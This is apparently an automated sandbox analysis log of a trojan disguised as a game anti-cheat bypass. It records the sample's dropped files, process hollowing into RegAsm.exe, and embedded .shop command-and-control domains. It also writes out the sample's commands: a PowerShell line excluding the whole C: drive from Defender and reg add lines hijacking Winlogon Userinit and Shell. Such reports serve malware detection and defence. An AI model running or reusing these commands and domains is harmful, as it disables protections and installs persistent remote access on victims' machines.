                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 598857
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 598745
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 598607
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 598500
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 598391
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 598281
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 598172
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 598063
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 597938
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 597813
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 597688
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 597578
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 597469
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 597344
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 597223
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 597032
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 596157
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 595969
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 595719
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 595422
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 595282
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 595090
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 594946
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 594672
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 594391
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 594188
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 593703
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 593485
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 592969
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 592750
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 592453
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 592250
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 592032
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 591657
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 591358
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 591063
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 590907
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 590516
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 590157
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 589953
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 589688
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 589469
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 589000
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 588719
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 588266
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 588078
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 587782
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 587607
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 587497
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 587375
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 587266
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeThread delayed: delay time: 587155
                      Source: RegAsm.exe, 0000000D.00000002.1946222478.000000000149B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.1946222478.00000000014E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Bypass.exe, 0000000F.00000002.4223150411.000000001BB8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00436530 LdrInitializeThunk,13_2_00436530
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF7161476D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7161476D8
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009DAD74 mov eax, dword ptr fs:[00000030h]12_2_009DAD74
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009D52A4 mov ecx, dword ptr fs:[00000030h]12_2_009D52A4
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF716150D20 GetProcessHeap,0_2_00007FF716150D20
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF7161476D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7161476D8
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF716143354 SetUnhandledExceptionFilter,0_2_00007FF716143354
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF716142510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF716142510
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF716143170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF716143170
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D3576D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF64D3576D8
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D353170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF64D353170
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D352510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF64D352510
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: 11_2_00007FF64D353354 SetUnhandledExceptionFilter,11_2_00007FF64D353354
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009C75F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_009C75F4
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009C7823 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_009C7823
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009C79B0 SetUnhandledExceptionFilter,12_2_009C79B0
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_009D3947 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_009D3947
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\'
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 12_2_00EA018D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,12_2_00EA018D
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: Loader.exeString found in binary or memory: doughtdrillyksow.shop
                      Source: Loader.exeString found in binary or memory: facilitycoursedw.shop
                      Source: Loader.exeString found in binary or memory: bargainnygroandjwk.shop
                      Source: Loader.exeString found in binary or memory: disappointcredisotw.shop
                      Source: Loader.exeString found in binary or memory: leafcalfconflcitw.shop
                      Source: Loader.exeString found in binary or memory: injurypiggyoewirog.shop
                      Source: Loader.exeString found in binary or memory: publicitycharetew.shop
                      Source: Loader.exeString found in binary or memory: computerexcudesp.shop
                      Source: Loader.exeString found in binary or memory: backcreammykiel.shop
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43B000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1116008Jump to behavior
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF71613B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF71613B190
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypass.bat" "Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.batJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\'Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /c y /n /t 10 /d yJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\WINDOWS\system32\userinit.exe, C:\Users\skeet\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe" /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "C:\WINDOWS\system32\explorer.exe, C:\ProgramData\SoftwareDistribution\572stuOQ0pZG2Xj.exe" /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe C:\Users\user\AppData\Local\Temp\Loader\Loader.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Loader\vO7REz65fRBWcJa.vbs" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeProcess created: C:\ProgramData\SoftwareDistribution\Bypass.exe "C:\ProgramData\SoftwareDistribution\Bypass.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: Bypass.exe, 0000000F.00000002.4119735415.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005BC7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005AD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"921702","UserName":"user","IpInfo":{"ip":"Unknown","hostname":"Unknown","city":"Unknown","region":"Unknown","country":"XX","loc":"Unknown","org":"Unknown","postal":"Unknown","timezone":"Unknown"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"M8H3FDED (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5} L
                      Source: Bypass.exe, 0000000F.00000002.4119735415.0000000005AB7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005BF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: Bypass.exe, 0000000F.00000002.4119735415.0000000005AB7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005BF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"921702","UserName":"user","IpInfo":{"ip":"Unknown","hostname":"Unknown","city":"Unknown","region":"Unknown","country":"XX","loc":"Unknown","org":"Unknown","postal":"Unknown","timezone":"Unknown"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"M8H3FDED (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
                      Source: Bypass.exe, 0000000F.00000002.4119735415.0000000005AB7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005BF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"M8H3FDED (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"S
                      Source: Bypass.exe, 0000000F.00000002.4119735415.0000000005AB7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005BF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"921702","UserName":"user","IpInfo":{"ip":"Unknown","hostname":"Unknown","city":"Unknown","region":"Unknown","country":"XX","loc":"Unknown","org":"Unknown","postal":"Unknown","timezone":"Unknown"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"M8H3FDED (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}H;
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF7161558E0 cpuid 0_2_00007FF7161558E0
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF71613A2CC
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeCode function: GetLocaleInfoW,GetNumberFormatW,11_2_00007FF64D34A2CC
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: EnumSystemLocalesW,12_2_009E2091
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_009E211C
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: GetLocaleInfoW,12_2_009E236F
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_009E2498
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: GetLocaleInfoW,12_2_009E259E
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_009E266D
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: EnumSystemLocalesW,12_2_009D95F3
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: GetLocaleInfoW,12_2_009D9ABC
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,12_2_009E1D09
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: EnumSystemLocalesW,12_2_009E1FAB
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: EnumSystemLocalesW,12_2_009E1FF6
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: GetLocaleInfoW,12_2_009E1F04
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeQueries volume information: C:\ProgramData\SoftwareDistribution\Bypass.exe VolumeInformation
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF716140754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF716140754
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeCode function: 0_2_00007FF7161251A4 GetVersionExW,0_2_00007FF7161251A4
